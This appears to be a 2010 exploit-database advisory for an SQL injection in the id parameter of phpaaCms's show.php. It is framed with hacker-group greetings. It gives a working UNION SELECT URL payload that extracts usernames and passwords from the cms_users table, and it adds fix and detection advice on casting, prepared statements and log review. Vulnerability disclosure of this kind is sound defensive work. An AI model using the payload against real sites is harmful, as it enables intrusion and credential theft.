#Exploit Title: phpaaCms (show.php?id=) SQL Injection Vulnerability
# Software http://www.phpaa.cn
# Tested on: win 7
# category: webapp
# Code : n/a

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Gr33tz to All PakISTANI Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

----- [ Founder ] -----
Shafiq-Ur-rehman

----- [ Email] -----
aol.shafiq@gmail.com

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
{{{{TITLE}}} PHPAA (show.php) SQL Injection Vulnerability

+++++[ Vendor ]+++++
http://www.phpaa.cn
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

----- [ SQL Injection ] -----
Put [SQL CODE]
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]

{Tested On}

----- [ Live Link (s) ] -----
[SQLi] http://<server>/show.php?id=1[CODE]
[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--

----- [ Fix / Detection ] -----
The injection point is the id parameter of show.php: text appended after the number is executed as part of the query, which suggests id is placed into the SQL string without validation (the source is not shown here, so confirm in show.php itself). Cast id to an integer or bind it through a prepared statement before it reaches the query. The example above reads username and password from cms_users, so on an affected install treat those credentials as exposed, and review web logs for show.php requests whose id value is not a plain number.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Thanks To All: www.Exploit-db.com | Ksecurity-team Members|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>>Live Long Pakistan<<
>>> Live Long Azad Kashmir<<<
>>> Proud To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010